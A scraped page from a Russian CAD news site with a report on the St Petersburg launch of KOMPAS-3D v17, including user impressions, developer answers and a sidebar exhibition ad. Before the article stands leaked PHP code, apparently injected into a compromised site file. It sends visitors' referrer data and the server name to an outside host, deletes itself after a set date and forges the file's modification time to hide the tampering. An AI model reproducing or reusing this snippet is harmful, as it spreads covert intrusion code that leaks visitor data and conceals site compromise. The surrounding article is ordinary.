check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Главный экспонат: репортаж с «музейной» презентации КОМПАС-3D v17 в Санкт-Петербурге
 

ГеММа-3D

СОВЕРШЕНСТВО ТЕХНОЛОГИЙ РОССИИ

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта

Главный экспонат: репортаж с «музейной» презентации КОМПАС-3D v17 в Санкт-Петербурге

E-mail Печать PDF

Вот уже почти месяц КОМПАС-3D v17 шагает по стране, вызывая у одних инженеров восторг и поддержку, у других — осторожное одобрение, а у третьих — просто желание поскорее взяться за работу в новой версии. В конце апреля премьера v17 состоялась в Санкт-Петербурге, в зале, который оказался под стать прогрессивному интерфейсу КОМПАС-3D и новинкам с вау-эффектом — ведь презентация проходила в музее современного искусства «Эрарта». Возможно, дело в самой атмосфере музея, где каждый глоток воздуха — свежий, или же это инженеры Санкт-Петербурга готовы ко всему новому и прорывному, но КОМПАС-3D v17 Северную столицу однозначно покорил.


Демонстрируя возможности нового интерфейса, команда КОМПАС-3D предложила участникам семинара самим выбрать цветовую гамму — аудитория дружно проголосовала за темную (конечно, до белых ночей было еще далеко!). Все возможности v17 были показаны в режиме онлайн: шаг за шагом зал вместе со специалистами АСКОН строил модель поршневого оппозитного двигателя с использованием компоновочной геометрии. Во время этого «живого» моделирования участники могли, прямо как на экскурсии, заглянуть в большинство новых или существенно изменившихся уголков КОМПАС-3D. Кстати, заблудиться в новой версии невозможно, даже если ты открыл ее первый раз, — КОМПАС подсказывает пользователю, в каком режиме он находится и какое действие должно быть следующим.


Но настоящим инженерам мало быть в роли зрителя! Поэтому некоторые из них, освоившись «на местности» во время показа, приступили к самостоятельному тестированию v17 – нужно было на скорость создать модель шатуна по чертежам. А справившись с задачей, поделились впечатлениями.

Егор Костенко, сервис-инженер «Синтрол»:

«Мы продаем импортное аналитическое оборудование, самостоятельно делаем из него системы, компонуем, проектируем электрику, разводку газовых схем, обслуживаем, ремонтируем. Некоторые детали надо спроектировать, чтобы отдать на производство. Сейчас я использую КОМПАС-3D V16. Серый интерфейс v17 мне, если честно, не очень нравится — я бы сделал его в голубых тонах. Пока новые кнопки располагаются в не самых очевидных местах, но это просто с непривычки. Хотя я пользовался поиском — и это очень классная функция. Да и вообще, стало гораздо удобнее — например, часто используемые операции сосредоточены в одном месте. Я ждал v17, скачал бету, но потом решил, что лучше не разбираться с бета-версией, а попробовать новинки, когда все недочеты будут устранены».



Кстати, на презентации присутствовал лучший бета-тестер КОМПАС-3D V8 Plus (а это ведь 2005 год!) Олег Богданенко, лауреат первой премии Двигатель прогресса за вклад в развитие программных продуктов АСКОН. Мы решили узнать, каково это, тестировать уже десятую версию продукта.

«На предприятии, где я раньше работал, использовался Pro/Engineer. Наши ребята слали разработчикам системы массу предложений по доработке — мало сказать, что ничего не было реализовано, не было даже какой-либо реакции. В случае с КОМПАСом я понимаю, что я, конкретный человек, всего лишь один из пользователей, могу повлиять на развитие системы. И вот, влияю с версии 5.11, — рассказывает Олег Богданенко. — Началось все с того, что я зашел в книжный магазин и увидел книгу Александра Потемкина по КОМПАСу, написанную очень толково, понятно и интересно. Это, пожалуй, образец книги, посвященной компьютерной программе. Я узнал, что существуют АСКОН и КОМПАС. До этого работал в Автокаде. Огромная, толстая и серьезная книга про Автокад очень подробно и сложно рассказывала о том, как создавать чертежи, соответствующие ГОСТу. И в итоге на последней странице приводился чертеж болта. Вот эту толстую книгу надо изучить, чтобы получить результат — болт по ГОСТу. А в КОМПАСе все можно получить сразу, ЕСКД из коробки. Для меня был фантастический рывок, когда из Автокада мы перешли на КОМПАС. Пару вечеров за 17-й версией я просидел. Честно говоря, был шокирован: смена интерфейса — большой стресс. Но все-таки один мы уже пережили, когда переходили с V5 на V6».


Олег Богданенко делится впечатлениями

Во второй части презентации новинок v17 на экране появилась рука. Она не просто притягивала внимание зрителей, но и наглядно демонстрировала возможность чтения формата .stl. Дело в том, что когда-то на одном из мероприятий АСКОН, чтобы показать, на что способен 3D-сканер, пришлось отсканировать руку. Но полученный тогда файл нельзя было использовать в КОМПАСе, а вот новая версия расширяет возможности для реверс-инжиниринга: переданную в КОМПАС 3D-геометрию можно использовать, например, для восстановления и достройки сломанной детали.


Предсказуемые овации сорвала «убийственная», как ее называют разработчики, фича — новое приложение КОМПАС-Эксперт, позволяющее проверить модели и чертежи в КОМПАС-3D и исправить их до того, как документация попадет в производство.

Вероника Павлова, инженер-конструктор НПП «Орион»:

«Мне v17 очень понравилась, все понятно и удобно, а новинки очень помогут нам в работе и сделают ее легче. Я, например, помимо конструкторских задач выполняю еще и функции нормоконтроля. И КОМПАС-Эксперт в этом смысле меня, безусловно, порадовал. Сами конструкторы теперь смогут проверять свои чертежи на ошибки, допущенные по недосмотру. Это большая помощь, особенно, когда конструкторский коллектив большой. Мы сейчас работаем в V16.1, но некоторым коллегам уже установили КОМПАС-3D v17. Кого-то, конечно, сначала пугает новый интерфейс, но после просмотра обучающего видео, где все весьма подробно объяснено, версия нравится всем. Ведь и правда, произошла революция — из версии в версию интерфейс системы не менялся, люди привыкли работать в базовой конфигурации, там были лишние меню, а сейчас все оптимизировано и удобно собрано в один блок. Наша компания занимается производством гидравлических установок. Мы часто пользуемся приложениями Оборудование: Трубопроводы и Оборудование: Металлоконструкции. На презентации узнали, насколько легко все теперь переносится из 3D-сборки в спецификацию, к тому же все приложения собраны внутри нового интерфейса».

Во время сессии вопросов к разработчикам один из участников задал каверзный вопрос: мол, сам КОМПАС позволяет проставить шероховатость неправильно, а КОМПАС-Эксперт, значит, теперь будет проверять допущенные системой ошибки?

Игорь Волокитин, менеджер по продукту КОМПАС-3D: «Насколько я помню, по ГОСТу нельзя ставить шероховатость «вниз головой», верно? Да, в КОМПАСе вы можете проставить ее неправильно. А КОМПАС-Эксперт поймет это и подскажет, что была допущена ошибка. Но ведь мы работаем не только для российского рынка — у стандартов ISO нет таких жестких ограничений».

Владимир Панченко, руководитель дивизиона Приложения: «Правда, у нас стали спрашивать — как так, КОМПАС разрешает, а «Эксперт» запрещает? Но к ограничениям надо подходить разумно. Если САПР будет блокировать ваши действия и выдавать предупреждение каждый раз при возникновении потенциальной ошибки, вы просто не сможете работать. Это касается начертания цифр, символов, шероховатостей... Когда мы выполняем редактирование, мы можем в эту «проблемную» зону попасть и исправить ошибку. Но если КОМПАС будет каждый раз пугать и говорить «Нельзя! Стоп!», инженер будет в постоянном стрессе. Проверить свою работу постфактум с помощью КОМПАС-Эксперт — намного лучше».


Сергей Евсиков, Игорь Волокитин, Владимир Панченко

Одним хитрым вопросом аудитория не ограничилась. Например, разработчиков спросили, думали ли они пойти по пути Microsoft и заставить всех обновляться на v17 принудительно, да и каким вообще они видят переход со старых версий на новую?

Сергей Евсиков, директор АСКОН-Системы проектирования:

«Мы прекрасно понимаем, что все, что создается в КОМПАСе, является продуктом вашего предприятия. Ваш бизнес завязан на наших системах, и мы должны заботиться об обновлениях, предоставлять более эффективный инструмент. Иногда на предприятиях используются версии КОМПАС-3D разных лет, иногда в системе работают по 200-300 человек. В таких условиях переход на новую версию для предприятия может быть затратным — по времени и ресурсам, и мы стараемся это учитывать.

Когда мы разрабатывали v17, нужно было обеспечить комфортный переход на нее с других САПР, и в то же время соблюсти преемственность версий. Сейчас мы видим, что конструкторы переходят на новую версию за 4-5 часов работы, и им не хочется возвращаться к старой. Некоторые интерфейсные вещи нам пришлось реализовать именно с учетом этой наследственности — у нас были и более революционные по составу команд и даже по начертанию иконок варианты.

Более комфортному переходу способствует и поддержка форматов. Мы всегда декларировали, что в любая новая версия будет читать документы, созданные в более ранних версиях. Мы также даем возможность сохранить файл — чертеж, документ, модель — из текущей версии в формат предыдущей и более ранней версии (то есть сейчас это V16.1, V15)».


Пользователи и участники презентации тоже примерили на себя новую версию и представили, как им будет работаться с КОМПАС-3D v17.

Антон Галкин, технический директор «Главконструктор»:

«Вообще-то я работаю в другой САПР, но пришел посмотреть на новый КОМПАС. И знаете, я впечатлен — это прорыв, особенно в сравнении с предыдущими версиями. Хотя, конечно, работа со спецификациями и чертежами всегда была преимуществом КОМПАСа, но теперь и все остальное выгляди комфортным. Наверное, если бы я пришел на новое предприятие, где бы использовали v17, то я бы перестроился легко. Система развивается, и это очень здорово».

Дмитрий Задорожный, инженер-конструктор ЦНИИ судового машиностроения:

«Мне кажется, КОМПАС вообще наиболее удобная программа. У нас сейчас 15-я версия, так что разница очень чувствуется! Я считаю, САПР должны быть простыми и понятными, а уж в свете сегодняшних событий отечественный софт имеет все преимущества перед импортным. Думаю, на освоение v17 мне потребуется несколько дней. Я почитаю литературу, посмотрю видео. Я попробовал — все хорошо, готов переходить!».

Антон Лукин, инженер-конструктор «Стройметалконструкция»:

«Выглядит v17 приятной и интуитивной в обращении. До этого я работал практически во всех зарубежных САПР — и сейчас КОМПАС приблизился к их удобству. У нас на предприятии пройдет автоматическое обновление версий, и мы очень рады переходу на v17. Мы занимаемся мостостроением, а это, как известно, и не машиностроение, и не строительство. У нас свои типовые металлоконструкции. В КОМПАСе мы работаем с чертежами КМД — сборка, деталировка. Мы получаем проект и делаем читаемые, доступные чертежи для производства. Так что для нас больная тема — автоматические чертежи. В специализированных системах есть автоматический вывод чертежей, это очень удобно. Хочется, чтобы и КОМПАС развивался в этом направлении — это значительно ускорит выдачу документации, производство».

Егор Павченков, инженер-конструктор, и Евгений Берников, ведущий инженер-конструктор, ПАО «Завод «Ладога» (Кировск):

«В 17-ой версии КОМПАС получил то, чего ему не хватало. Цветовое решение очень понравилось, это высший класс. И пусть первое время будет сложно, придется адаптироваться к интерфейсу, но все нововведения точно облегчат работу в дальнейшем. Мы больше не проектировщики, а производители, и мы используем 3D-модель для передачи в цех. У нас коллектив возрастной, и людям старой закалки может быть достаточно сложно принять такие изменения, потребуется время и тем, кто не знаком с другими САПР. Но это преодолимые сложности — обширное обновление, к которому нужно привыкнуть».

Завершилась презентация в Петербурге вопросом о будущем (вот ведь все-таки неутолима жажда инженеров к прогрессу и инновациям: мало им новой версии — нужно еще!) — что ждет КОМПАС-3D, да и проектирование как таковое. Оказалось, команда КОМПАС-3D хоть и готова творить революцию внутри системы дальше, считает, что произойдет она не в самих CAD-системах, а в технологиях производства. Распространение аддитивных технологий приведет к тому, что детали можно будет создавать любой формы и из любых материалов. Это повлияет на проектирование, вызовет постановку новых требований к инструментам инженеров. Возможно, в дальнейшем КОМПАС будет подстраиваться под производство, ведь проектировать надо будет не стандартные объекты, а построенные в результате топологической оптимизации.

Что ж, как показывает новый КОМПАС-3D v17, будущее наступает очень быстро!



Источник.
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск

Реклама


Случайная новость

Традиционная выставка оборудования Deckel Maho Gildemeister в России


Наш партнер - Новосибирский САПР Центр приглашает Вас на традиционную осеннюю выставку оборудования Deckel Maho Gildemeister в Новосибирске.

Оборудование DMG – это признанный во всем мире стандарт качества. Но чтобы дорогостоящие станки эффективно работали на Вашу компанию, необходимо комплексное решение для производства.
Стоит подчеркнуть, что выставка освещает не только новинки оборудования DMG, но и вопросы по подбору инструмента и оснастки, а также учебные проекты DMG и современные финансовые механизмы.
На выставке вы сможете обсудить все ключевые моменты, которые являются определяющими при покупке и внедрении оборудования, а именно:
- цена и условия оплаты;
- сроки поставки;
- пуско-наладочные работы;
- инструмент и оснастка;
- программное обеспечение;
- обучение операторов станков и технологов-программистов ЧПУ.

ОСНОВНЫЕ ТЕМЫ ВЫСТАВКИ:
- Инновационные станки концерна DMG – DMG Ecoline, новинки и оригинальные решения.
- Учебные проекты DMG: для промышленности и учебных заведений (ВУЗ, СПО, НПО).
- Продукты DMG: новое, выставочное, подержанное оборудование.
- Применение инструментов и оснастки
- Приобретение оборудования в лизинг. Уникальное решение от «МТЕ-Финанс»

По всем вопросам обращайтесь:

НТЦ ГеММа (495)777-59-29
gemma@gemma.ru